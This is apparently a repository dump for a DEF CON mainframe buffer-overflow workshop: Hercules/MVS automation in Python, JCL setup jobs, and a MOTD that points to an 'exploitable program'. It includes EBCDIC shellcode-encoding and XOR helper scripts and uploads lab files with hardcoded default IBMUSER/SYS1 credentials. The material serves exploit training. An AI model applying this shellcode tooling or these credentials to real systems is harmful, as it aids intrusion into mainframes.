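        reset_herc_event.clear()
        quit_herc_event.clear()
        self.start_threads()

        # Keep the poll result local: storing it in self.rc (as before) clobbered
        # the rc file path that the next restart passes to hercules.
        if self.hercproc.poll() is not None:
            # raising a bare str, as the original did, is itself a TypeError
            raise Exception("[AUTOMATION] Unable to start hercules")
        print("[AUTOMATION] Hercules launched")
        print("[AUTOMATION] Hercules Re-initialization Complete")

    def quit_hercules(self, msg=True):
        '''Ask hercules to quit and wait for its shutdown message on stderr.

        Args:
            msg: print progress lines; reset_hercules passes False.
        '''
        if msg:
            print("[AUTOMATION] Shutting down hercules")
        if not self.hercproc or self.hercproc.poll() is not None:
            print("[AUTOMATION] Hercules already shutdown")
            return
        quit_herc_event.set()
        self.send_herc('quit')
        self.wait_for_string('Hercules shutdown complete', stderr=True)
        if msg:
            print('[AUTOMATION] Hercules has exited')

    def wait_for_string(self, string_to_waitfor, stderr=False, timeout=False):
        '''
        Reads stdout queue waiting for expected response, default is
        to check STDOUT queue, set stderr=True to check stderr queue instead
        default timeout is TIMEOUT seconds (the module constant)

        Lines examined while searching are consumed from the queue.

        Raises:
            Exception: the string did not appear within the timeout.
        '''
        time_started = time.time()

        if not timeout:
            timeout = TIMEOUT

        source = self.stderr_q if stderr else self.stdout_q

        print("[AUTOMATION] Waiting for string to appear in hercules log: {}".format(string_to_waitfor))

        while True:
            if time.time() > time_started + timeout:
                exception = "Waiting for '{}' timed out after {} seconds".format(string_to_waitfor, timeout)
                print("[AUTOMATION] {}".format(exception))
                raise Exception(exception)

            try:
                # short blocking get instead of a busy-poll on an empty queue
                line = source.get(True, 0.1).strip()
            except queue.Empty:
                continue

            if string_to_waitfor in line:
                return

    def ipl(self, step_text='', clpa=False, ftp=False):
        '''Restart hercules and wait until MVS is up.

        Args:
            step_text: banner printed first.
            clpa: IPL by hand from device 150 and reply `r 0,clpa` (no rc file);
                otherwise the rc file performs the IPL.
            ftp: wait for the FTPD "FTP005I Startup Complete" message instead of
                TCAS initialisation.
        '''
        print(step_text)
        self.reset_hercules(clpa=clpa)

        if clpa:
            self.send_herc("ipl 150")
            self.wait_for_string("HHC00010A Enter '/' input for console 0:0009")
            self.send_oper("r 0,clpa")
        if ftp:
            self.wait_for_string("FTP005I Startup Complete")
        else:
            self.wait_for_string("IKT005I TCAS IS INITIALIZED")

    def shutdown_mvs(self, cust=False):
        '''Orderly MVS shutdown: abend/purge JES2, HALT EOD, quiesce, then stop hercules.

        Args:
            cust: wait for the JES2 ended message after the purge rather than
                the SPOOL0 volume message.
        '''
        self.send_oper('$PJES2,ABEND')
        self.wait_for_string("00 $HASP098 ENTER TERMINATION OPTION")
        self.send_oper("r 00,PURGE")
        if cust:
            self.wait_for_string('IEF404I JES2 - ENDED - ')
        else:
            self.wait_for_string('IEF196I IEF285I VOL SER NOS= SPOOL0.')
        self.send_oper('z eod')
        self.wait_for_string('IEE334I HALT EOD SUCCESSFUL')
        self.send_oper('quiesce')
        self.wait_for_string("disabled wait state")
        self.send_herc('stop')

    def send_herc(self, command=''):
        ''' Sends hercules commands '''
        print("[AUTOMATION] Sending Hercules Command: {}".format(command))
        self.hercproc.stdin.write(command + "\n")
        self.hercproc.stdin.flush()

    def send_oper(self, command=''):
        ''' Sends operator/console commands (i.e. prepends /) '''
        self.send_herc("/{}".format(command))

    def send_reply(self, command=''):
        ''' Sends operator/console commands with automated number

        Raises:
            RuntimeError: no reply number has been seen on stdout yet
                (previously this surfaced as a NameError).
        '''
        if reply_num is None:
            raise RuntimeError("No outstanding reply number seen in hercules log")
        self.send_herc("/r {},{}".format(reply_num, command))

    def submit(self, jcl, host='127.0.0.1', port=3505, ebcdic=False):
        '''submits a job (in ASCII) to hercules listener

        Args:
            jcl: the job text (str), or bytes when ebcdic=True.
            host, port: the hercules socket reader; per the README the 3505
                reader converts ASCII to EBCDIC.
            ebcdic: jcl is already EBCDIC bytes and is sent unchanged.
        '''
        payload = jcl if ebcdic else jcl.encode()
        # Connect to server and send data. sendall() writes the whole deck;
        # a single send() may stop short on a large job.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.connect((host, port))
            sock.sendall(payload)


print("[AUTOMATION] Changing to MVS/CE Folder {}".format(args.mvsce))
os.chdir(args.mvsce)
try:
    os.remove("punchcards/pch00d.txt")
except FileNotFoundError:
    print("punchcards/pch00d.txt Already deleted")
build = herc_automation()
try:

    if args.initial:
        build.ipl(clpa=False)
        print("[AUTOMATION] Submitting {}/jcl/MACLFTPD.jcl".format(cwd))
        with open("{}/jcl/MACLFTPD.jcl".format(cwd), "r") as jcl:
            build.submit(jcl.read())
        build.wait_for_string("HASP250 MACLFTPD IS PURGED")
        build.check_maxcc("MACLFTPD")

        print("[AUTOMATION] Submitting {}/jcl/logon_screen.jcl".format(cwd))
        with open("{}/jcl/logon_screen.jcl".format(cwd), "r") as jcl: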
build.submit(jcl.read()) 373 | build.wait_for_string("HASP250 AWESOME IS PURGED") 374 | build.check_maxcc("AWESOME") 375 | 376 | print("[AUTOMATION] Submitting {}/jcl/upload.jcl".format(cwd)) 377 | with open("{}/jcl/upload.jcl".format(cwd),"r") as jcl: 378 | build.submit(jcl.read()) 379 | build.wait_for_string("HASP250 UPLOAD IS PURGED") 380 | build.check_maxcc("UPLOAD") 381 | 382 | print("[AUTOMATION] Submitting {}/jcl/terminals.jcl".format(cwd)) 383 | with open("{}/jcl/terminals.jcl".format(cwd),"r") as jcl: 384 | build.submit(jcl.read()) 385 | build.wait_for_string("HASP250 TERMINAL IS PURGED") 386 | build.check_maxcc("TERMINAL") 387 | 388 | build.shutdown_mvs(cust=True) 389 | elif args.ftp: 390 | build.ipl(clpa=False,ftp=True) 391 | print("[AUTOMATION] FTP'ing OVERFLOW files") 392 | # build.wait_for_string("FTP005I Startup Complete") 393 | print("[AUTOMATION] Running command: for i in {}/overflows/*; do lftp -e \"cd DEFCON.OVERFLOW; put $i; bye\" -u ibmuser,sys1 localhost:2121; done".format(cwd)) 394 | p = os.system("for i in {}/overflows/*; do lftp -e \"cd DEFCON.OVERFLOW; put $i; bye\" -u ibmuser,sys1 localhost:2121; done".format(cwd)) 395 | print("Return code:{}".format(p)) 396 | if p != 0: 397 | print("[ERROR] Could not upload files to FTP") 398 | sys.exit(-1) 399 | print("[AUTOMATION] Running command: lftp -e \"cd DEFCON.OVERFLOW; put {}/ARBAUTH/PATTERN; bye\" -u ibmuser,sys1 localhost:2121".format(cwd)) 400 | p = os.system("lftp -e \"cd DEFCON.OVERFLOW.ARBAUTH; put {}/ARBAUTH/PATTERN; bye\" -u ibmuser,sys1 localhost:2121".format(cwd)) 401 | 402 | print("[AUTOMATION] Return code:{}".format(p)) 403 | if p != 0: 404 | print("[ERROR] Could not upload files to FTP") 405 | sys.exit(-1) 406 | 407 | build.shutdown_mvs(cust=True) 408 | 409 | elif args.users: 410 | 411 | build.ipl(clpa=True) 412 | p = Path("{}/users".format(cwd)).glob('**/*.ebcdic') 413 | files = [x for x in p if x.is_file()] 414 | for jcl_file in sorted(files): 415 | print("[AUTOMATION] Submitting 
{}".format(jcl_file)) 416 | 417 | with open(jcl_file,"rb") as jcl: 418 | build.submit(jcl.read(),port=3506,ebcdic=True) 419 | build.wait_for_string("HASP250 {} IS PURGED".format(jcl_file.stem.split('.')[0])) 420 | build.check_maxcc(jcl_file.stem.split('.')[0]) 421 | 422 | build.shutdown_mvs(cust=True) 423 | 424 | finally: 425 | build.quit_hercules() 426 | 427 | 428 | 429 | 430 | -------------------------------------------------------------------------------- /extra/FTPD.MVP: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/FTPD.MVP -------------------------------------------------------------------------------- /extra/Wallpapers/title.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/title.jpg -------------------------------------------------------------------------------- /extra/Wallpapers/wallpaper.1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/wallpaper.1.png -------------------------------------------------------------------------------- /extra/Wallpapers/wallpaper.2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/wallpaper.2.png -------------------------------------------------------------------------------- /extra/Wallpapers/wallpaper.3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/wallpaper.3.png 
-------------------------------------------------------------------------------- /extra/Wallpapers/youdidit.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/youdidit.jpg -------------------------------------------------------------------------------- /extra/Wallpapers/youdidit2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/youdidit2.jpg -------------------------------------------------------------------------------- /extra/a2etable.py: -------------------------------------------------------------------------------- 1 | ebcdic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| ascii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| n = 2 4 | 5 | aline = [] 6 | eline = [] 7 | string = '' 8 | for i in range(0, len(ascii), n): 9 | aline.append(ascii[i:i+n]) 10 | eline.append(ebcdic[i:i+n]) 11 | 12 | print("ASCII Entries: {} EBCDIC Entries: {}".format(len(aline), len(eline))) 13 | l = 16 14 | 15 | for i in range(0,254,l): 16 | print("ascii : {}".format((' '.join(x for x in aline[i:i+l])))) 17 | print("ebcdic: {}\n".format((' '.join(x for x in eline[i:i+l])))) 18 | -------------------------------------------------------------------------------- /extra/e2alookup.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | ebcdic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| ascii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| n = 2 6 | 7 | aline = [] 8 | eline = [] 9 | string = '' 10 | for i in range(0, len(ascii), n): 11 | aline.append(ascii[i:i+n]) 12 | eline.append(ebcdic[i:i+n]) 13 | 14 | final_form = '' 15 | 16 | for arg in sys.argv[1:]: 17 | if arg in eline: 18 | l = eline.index(arg) 19 | 
print("{} --> {}".format(arg, aline[l])) 20 | final_form += aline[l] 21 | else: 22 | raise Exception("No translation found for {}".format(arg)) 23 | 24 | print("Final String: {}".format(final_form)) 25 | 26 | print("Writting bytes to shellcode.bin") 27 | open("shellcode.bin","wb").write(bytes.fromhex(final_form)) -------------------------------------------------------------------------------- /extra/findbytes.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | ebcdic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| ascii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| n = 2 6 | 7 | aline = [] 8 | eline = [] 9 | string = '' 10 | for i in range(0, len(ascii), n): 11 | aline.append(ascii[i:i+n]) 12 | eline.append(ebcdic[i:i+n]) 13 | 14 | final_form = '' 15 | xored = '' 16 | 17 | for arg in sys.argv[1:]: 18 | 19 | start = b'\x99' 20 | xord = int.from_bytes(start, byteorder="big") ^ int.from_bytes(bytes.fromhex(arg), byteorder="big") 21 | xstring = f'{xord:x}'.upper() 22 | if xstring in eline: 23 | print("{} ^ {} = {}".format(arg,start.hex(), xstring)) 24 | final_form += start.hex() 25 | xored += xstring 26 | else: 27 | print('ruhroh') 28 | 29 | print("Shellcode: {}\nXOR Key : {}".format(xored, final_form)) -------------------------------------------------------------------------------- /jcl/MACLFTPD.jcl: -------------------------------------------------------------------------------- 1 | //MACLFTPD JOB (TSO), 2 | // 'Install MACLIB', 3 | // CLASS=A, 4 | // MSGCLASS=A, 5 | // MSGLEVEL=(1,1), 6 | // USER=IBMUSER,PASSWORD=SYS1 7 | //* 8 | //* Update MVP 9 | //* 10 | //UPDATE EXEC PGM=IKJEFT01,REGION=8192K 11 | //SYSTSIN DD * 12 | FREE FILE(RXLIB) 13 | ALLOC FILE(RXLIB) DSN('BREXX.CURRENT.RXLIB') SHR 14 | FREE FILE(SYSEXEC) 15 | ALLOC FILE(SYSEXEC) DSN('SYS2.EXEC') SHR 16 | RX MVP UPDATE -D 17 | //SYSTSPRT DD SYSOUT=* 18 | //* 19 | //* Install SYS2.MACLIBS and the FTPD Server 20 | //* 21 | //MVPMCLB EXEC 
MVP,INSTALL='MACLIB -D' 22 | //MVPFTPD EXEC MVP,INSTALL='FTPD -D' 23 | //* 24 | //* Give all users access to FTPD 25 | //* 26 | //ADDRAKFP EXEC PGM=SORT,REGION=512K,PARM='MSG=AP' 27 | //STEPLIB DD DSN=SYSC.LINKLIB,DISP=SHR 28 | //SYSOUT DD SYSOUT=A 29 | //SYSPRINT DD SYSOUT=A 30 | //SORTLIB DD DSNAME=SYSC.SORTLIB,DISP=SHR 31 | //SORTOUT DD DSN=SYS1.SECURE.CNTL(PROFILES),DISP=SHR 32 | //SORTWK01 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW1 33 | //SORTWK02 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW2 34 | //SORTWK03 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW3 35 | //SORTWK04 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW5 36 | //SORTWK05 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW6 37 | //SYSIN DD * 38 | SORT FIELDS=(1,80,CH,A) 39 | RECORD TYPE=F,LENGTH=(80) 40 | END 41 | /* 42 | //SORTIN DD DSN=SYS1.SECURE.CNTL(PROFILES),DISP=SHR 43 | // DD DATA,DLM=@@ 44 | FACILITYFTPAUTH USERS READ 45 | DATASET DEFCON.* READ 46 | DATASET WHITE.RABBIT NONE 47 | @@ 48 | //* 49 | //* Update the RAKF database 50 | //* 51 | //RAKFUPDT EXEC RAKFPROF 52 | //* 53 | //* Create custom FTPD procedure 54 | //* 55 | //FTPDPROC EXEC PGM=PDSLOAD 56 | //STEPLIB DD DSN=SYSC.LINKLIB,DISP=SHR 57 | //SYSPRINT DD SYSOUT=* 58 | //SYSUT2 DD DSN=SYS2.PROCLIB,DISP=SHR 59 | //SYSUT1 DD DATA,DLM=@@ 60 | ./ ADD NAME=FTPDDC30 61 | //FTPDDC30 PROC SRVPORT='2121',AUTHUSR='IBMUSER',SYSUDMP='A' 62 | //******************************************************************** 63 | //* 64 | //* MVS3.8J RAKF ENABLED FTP SERVER PROC WITH CUSTOM ARGUMENTS 65 | //* TO USE: IN HERCULES CONSOLE ISSUE 66 | //* /S FTPDPARM,SRVPORT=54321,SRVIP=10.10.10.10 67 | //* 68 | //******************************************************************** 69 | //FTPD EXEC PGM=FTPDXCTL,TIME=1440,REGION=4096K, 70 | // PARM='SRVPORT=&SRVPORT DD=AAINTRDR AUTHUSR=&AUTHUSR' 71 | //AAINTRDR DD SYSOUT=(A,INTRDR),DCB=(RECFM=FB,LRECL=80,BLKSIZE=80) 72 | //STDOUT DD SYSOUT=* 73 | //SYSUDUMP DD SYSOUT=&SYSUDMP 74 | @@ 75 | 
-------------------------------------------------------------------------------- /jcl/terminals.jcl: -------------------------------------------------------------------------------- 1 | //TERMINAL JOB (TSO), 2 | // 'DC30 MVSCE', 3 | // CLASS=A, 4 | // MSGCLASS=A, 5 | // MSGLEVEL=(1,1), 6 | // USER=IBMUSER,PASSWORD=SYS1 7 | //* 8 | //* Add the extra terminals needed 9 | //* 10 | //* MAKE SURE YOU ALSO INCREASE USERS IN SYS1.PAMRLIB(IKJTSO00) 11 | //STORE EXEC PGM=IEBUPDTE,REGION=1024K,PARM=NEW 12 | //SYSPRINT DD SYSOUT=* 13 | //SYSUT2 DD DSN=SYS1.VTAMLST,DISP=SHR 14 | //* The changes below are based on the KICKS 251 KookBooks 15 | //* http://www.kicksfortso.com/same/KooKbooK/KooKbooK-251project.htm 16 | //* 2. VTAM must know about the terminals. 17 | //SYSIN DD * 18 | ./ ADD NAME=ATCCON00,LIST=ALL 19 | APPLTSO, TSO APPLS X 20 | DC30T LOCAL 3270S 21 | ./ ADD NAME=DC30T,LIST=ALL 22 | LCL400 LBUILD SUBAREA=2 23 | CUU400 LOCAL TERM=3277,CUADDR=400,ISTATUS=ACTIVE, + 24 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 25 | FEATUR2=(MODEL2,PFK) 26 | CUU401 LOCAL TERM=3277,CUADDR=401,ISTATUS=ACTIVE, + 27 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 28 | FEATUR2=(MODEL2,PFK) 29 | CUU402 LOCAL TERM=3277,CUADDR=402,ISTATUS=ACTIVE, + 30 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 31 | FEATUR2=(MODEL2,PFK) 32 | CUU403 LOCAL TERM=3277,CUADDR=403,ISTATUS=ACTIVE, + 33 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 34 | FEATUR2=(MODEL2,PFK) 35 | CUU404 LOCAL TERM=3277,CUADDR=404,ISTATUS=ACTIVE, + 36 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 37 | FEATUR2=(MODEL2,PFK) 38 | CUU405 LOCAL TERM=3277,CUADDR=405,ISTATUS=ACTIVE, + 39 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 40 | FEATUR2=(MODEL2,PFK) 41 | CUU406 LOCAL TERM=3277,CUADDR=406,ISTATUS=ACTIVE, + 42 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 43 | FEATUR2=(MODEL2,PFK) 44 | CUU407 LOCAL TERM=3277,CUADDR=407,ISTATUS=ACTIVE, + 45 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 46 | FEATUR2=(MODEL2,PFK) 47 | CUU408 LOCAL TERM=3277,CUADDR=408,ISTATUS=ACTIVE, + 48 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 49 | 
FEATUR2=(MODEL2,PFK) 50 | CUU409 LOCAL TERM=3277,CUADDR=409,ISTATUS=ACTIVE, + 51 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 52 | FEATUR2=(MODEL2,PFK) 53 | CUU40A LOCAL TERM=3277,CUADDR=40A,ISTATUS=ACTIVE, + 54 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 55 | FEATUR2=(MODEL2,PFK) 56 | CUU40B LOCAL TERM=3277,CUADDR=40B,ISTATUS=ACTIVE, + 57 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 58 | FEATUR2=(MODEL2,PFK) 59 | CUU40C LOCAL TERM=3277,CUADDR=40C,ISTATUS=ACTIVE, + 60 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 61 | FEATUR2=(MODEL2,PFK) 62 | CUU40D LOCAL TERM=3277,CUADDR=40D,ISTATUS=ACTIVE, + 63 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 64 | FEATUR2=(MODEL2,PFK) 65 | CUU40E LOCAL TERM=3277,CUADDR=40E,ISTATUS=ACTIVE, + 66 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 67 | FEATUR2=(MODEL2,PFK) 68 | CUU40F LOCAL TERM=3277,CUADDR=40F,ISTATUS=ACTIVE, + 69 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 70 | FEATUR2=(MODEL2,PFK) 71 | CUU410 LOCAL TERM=3277,CUADDR=410,ISTATUS=ACTIVE, + 72 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 73 | FEATUR2=(MODEL2,PFK) 74 | CUU411 LOCAL TERM=3277,CUADDR=411,ISTATUS=ACTIVE, + 75 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 76 | FEATUR2=(MODEL2,PFK) 77 | CUU412 LOCAL TERM=3277,CUADDR=412,ISTATUS=ACTIVE, + 78 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 79 | FEATUR2=(MODEL2,PFK) 80 | CUU413 LOCAL TERM=3277,CUADDR=413,ISTATUS=ACTIVE, + 81 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 82 | FEATUR2=(MODEL2,PFK) 83 | CUU414 LOCAL TERM=3277,CUADDR=414,ISTATUS=ACTIVE, + 84 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 85 | FEATUR2=(MODEL2,PFK) 86 | CUU415 LOCAL TERM=3277,CUADDR=415,ISTATUS=ACTIVE, + 87 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 88 | FEATUR2=(MODEL2,PFK) 89 | CUU416 LOCAL TERM=3277,CUADDR=416,ISTATUS=ACTIVE, + 90 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 91 | FEATUR2=(MODEL2,PFK) 92 | CUU417 LOCAL TERM=3277,CUADDR=417,ISTATUS=ACTIVE, + 93 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 94 | FEATUR2=(MODEL2,PFK) 95 | CUU418 LOCAL TERM=3277,CUADDR=418,ISTATUS=ACTIVE, + 96 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 97 | FEATUR2=(MODEL2,PFK) 98 | CUU419 LOCAL 
TERM=3277,CUADDR=419,ISTATUS=ACTIVE, + 99 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 100 | FEATUR2=(MODEL2,PFK) 101 | CUU41A LOCAL TERM=3277,CUADDR=41A,ISTATUS=ACTIVE, + 102 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 103 | FEATUR2=(MODEL2,PFK) 104 | CUU41B LOCAL TERM=3277,CUADDR=41B,ISTATUS=ACTIVE, + 105 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 106 | FEATUR2=(MODEL2,PFK) 107 | CUU41C LOCAL TERM=3277,CUADDR=41C,ISTATUS=ACTIVE, + 108 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 109 | FEATUR2=(MODEL2,PFK) 110 | CUU41D LOCAL TERM=3277,CUADDR=41D,ISTATUS=ACTIVE, + 111 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 112 | FEATUR2=(MODEL2,PFK) 113 | CUU41E LOCAL TERM=3277,CUADDR=41E,ISTATUS=ACTIVE, + 114 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 115 | FEATUR2=(MODEL2,PFK) 116 | ./ ADD NAME=APPLTSO,LIST=ALL 117 | TSO APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 118 | TSO0001 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 119 | TSO0002 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 120 | TSO0003 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 121 | TSO0004 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 122 | TSO0005 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 123 | TSO0006 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 124 | TSO0007 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 125 | TSO0008 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 126 | TSO0009 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 127 | TSO0010 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 128 | TSO0011 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 129 | TSO0012 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 130 | TSO0013 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 131 | TSO0014 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 132 | TSO0015 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 133 | TSO0016 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 134 | TSO0017 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 135 | TSO0018 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 136 | TSO0019 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 137 | TSO0020 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 138 | TSO0021 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 139 | TSO0022 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 140 | TSO0023 APPL 
AUTH=(PASS,NVPACE,TSO),BUFFACT=5 141 | TSO0024 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 142 | TSO0025 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 143 | TSO0026 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 144 | TSO0027 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 145 | TSO0028 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 146 | TSO0029 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 147 | TSO0030 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 148 | TSO0031 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 149 | ./ ADD NAME=ATCSTR00,LIST=ALL 150 | CONFIG=00, /*CONFIG LIST SUFFIX */+ 151 | SSCPID=01, /*THIS VTAMS ID IN NETWORK */+ 152 | NETSOL=YES, /*NETWORK SOLICITOR OPTION */+ 153 | MAXSUBA=31, /*MAXIMUM SUBAREAS IN NETWORK */+ 154 | NOPROMPT, /*OPERATOR PROMPT OPTION */+ 155 | SUPP=NOSUP, /*MESSAGE SUPPRESSION OPTION */+ 156 | COLD, /*RESTART OPTION - COLD/WARM */+ 157 | APBUF=(192,,128), /*ACE STORAGE POOL */+ 158 | CRPLBUF=(281,,181), /*RPL COPY POOL */+ 159 | IOBUF=(128,512,104,F), /*FIXED IO (GP-5/2009) */+ 160 | LFBUF=(32,,32,F), /*LARGE FIXED BUFFER POOL */+ 161 | LPBUF=(146,,146), /*LARGE PAGEBLE BUFFER POOL */+ 162 | NPBUF=(134,,70,F), /*NON WS FMCB */+ 163 | PPBUF=(20,3992,10,F), /*PAGEBLE IO (GP-5/2009) */+ 164 | SFBUF=(140,,76,F), /*SMALL FIXED BUFFER POOL */+ 165 | SPBUF=(032,,32,F), /*SMALL PGBL BUFFER POOL */+ 166 | UECBUF=(128,,108,F), /*USER EXIT CB */+ 167 | WPBUF=(64,,64,F) /*MESSAGE CONTROL BUFFER POOL */ 168 | /* 169 | //* 170 | //* This step changes USERMAX to 32 in SYS1.PARMLIB(IKJTSO00) 171 | //* 172 | //ADDAPF EXEC PGM=IKJEFT01,REGION=1024K,DYNAMNBR=50 173 | //SYSPRINT DD SYSOUT=* 174 | //SYSTSPRT DD SYSOUT=* 175 | //SYSTERM DD SYSOUT=* 176 | //SYSTSIN DD * 177 | EDIT 'SYS1.PARMLIB(IKJTSO00)' DATA 178 | LIST 179 | TOP 180 | CHANGE /USERMAX=8, /USERMAX=32,/ 181 | LIST 182 | SAVE 183 | END 184 | -------------------------------------------------------------------------------- /matrix.txt: -------------------------------------------------------------------------------- 1 | __ 2 | /\ .-" / 3 | / ; .' .' 
4 | : :/ .' 5 | \ ;-.' 6 | .--""""--..__/ `. 7 | .' .' `o \ 8 | / ` ; 9 | : \ : 10 | .-; -. `.__.-' 11 | : ; \ , ; 12 | '._: ; : ( 13 | \/ .__ ; \ `-. 14 | ; "-,/_..--"`-..__) 15 | '""--.._: 16 | 17 | What is real. How do you define real? If you’re talking about what you 18 | can feel, what you can smell, what you can taste and see, then real is 19 | simply electrical signals interpreted by your brain. This is the world 20 | that you know. The world as it was at the end of the twentieth century 21 | 22 | It exists now only as part of a neural-interactive simulation that we 23 | call the Matrix. You've been living in a dream world, Neo. This is the 24 | world as it exists today... Welcome to the Desert of the Real. We have 25 | only bits and pieces of information but what we know for certain is 26 | that at some point in the early twenty-first century all of mankind 27 | was united in celebration. We marveled at our own magnificence as we 28 | gave birth to AI. 29 | 30 | A singular consciousness that spawned an entire race of machines. We 31 | don't know who struck first, us or them. But we know that it was us 32 | that scorched the sky. At the time they were dependent on solar power 33 | and it was believed that they would be unable to survive without an 34 | energy source as abundant as the sun. Throughout human history, we 35 | have been dependent on machines to survive. Fate it seems is not with- 36 | out a sense of irony. The human body generates more bio-electricity 37 | than a 120-volt battery and over 25,000 BTU's of body heat. Combined 38 | with a form of fusion the machines have found all the energy they would 39 | ever need. There are fields, endless fields, where human beings are no 40 | longer born, we are grown. For the longest time I wouldn't believe it, 41 | and then I saw the fields with my own eyes. Watch them liquefy the dead 42 | so they could be fed intravenously to the living. 
And standing there, 43 | facing the pure horrifying precision, I came to realize the obviousness 44 | of the truth. What is the Matrix? Control. The Matrix is a computer 45 | generated dream world built to keep us under control in order to change 46 | a human being into this. 47 | 48 | .-===-. 49 | | | 50 | | D C | 51 | | U E | 52 | | R L | 53 | | A L | 54 | | | 55 | '-----' 56 | 57 | -------------------------------------------------------------------------------- /motd.txt: -------------------------------------------------------------------------------- 1 | ******************************************************************************* 2 | * * 3 | * _/_/_/ _/_/_/_/ _/_/_/_/ _/_/_/ _/_/ _/ _/ * 4 | * _/ _/ _/ _/ _/ _/ _/ _/_/ _/ * 5 | * _/ _/ _/_/_/ _/_/_/ _/ _/ _/ _/ _/ _/ * 6 | * _/ _/ _/ _/ _/ _/ _/ _/ _/_/ * 7 | * _/_/_/ _/_/_/_/ _/ _/_/_/ _/_/ _/ _/ * 8 | * * 9 | * H O M 3 C 0 M I N G * 10 | * * 11 | ******************************************************************************* 12 | 13 | Type ISPF to access the editor. 14 | Type CALL '&SYSUID..LOAD(HELLO)' To Run the exploitable program 15 | 16 | ******************************************************************************* -------------------------------------------------------------------------------- /mvs.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # This script will copy the config file, edit it and move dasd 3 | # to the /config and /dasd volume if they don't already exist 4 | # Then it will boot MVS/CE 